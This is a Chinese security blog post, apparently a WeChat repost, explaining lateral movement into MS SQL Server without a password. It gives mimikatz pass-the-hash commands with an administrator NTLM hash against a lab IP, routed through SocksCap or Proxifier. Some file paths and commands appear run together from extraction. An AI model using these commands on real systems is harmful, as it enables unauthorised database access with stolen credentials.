点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
一、前言
原理:mssql支持Windows身份验证登录(微软工具ssms支持),很多win机器上都是用administrator用户默认安装的,也就是说只要拿到目标administrator用户的hash,就可以利用本地hash注入,通过socks代理直连目标mssql
二、SocksCap
操作流程:用hash注入启动sockscap,把ssms拖到sockscap中启动,连接目标mssql。
分析:为什么要注入启动sockscap,这样在sockscap中启用ssms会自动继承sockscap进程的权限。通过进程分析发现ssms的父进程是sockscap。
1.打开mimikatz,hash注入sockscap
privilege::debugsekurlsa::pth /user:administrator /domain:192.168.144.146 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:C:allSocksCap64SocksCap64_RunAsAdmin.exe"
2.在sockscap中运行ssms
3.输入目标服务器名称,连接即可
4.通过进程分析,发现SSMS的父进程是sockscap
wmic process where Name="SSMS.exe" get ParentProcessId
三、proxifier
操作流程:打开proxifier。用hash注入启动ssms可连接目标mssql。
分析:sockscap和proxifier的使用方式不同。所以我们只要注入ssms即可。
1.启动proxifier
2.打开mimikatz,hash注入ssms
privilege::debugsekurlsa::pth /user:administrator /domain:192.168.144.146 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:C:allssmsCommon7IDESsms.exe"
3.连接
原文始发于微信公众号(sechub安全):横向渗透 | 无密码连接SQL Server的姿势
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论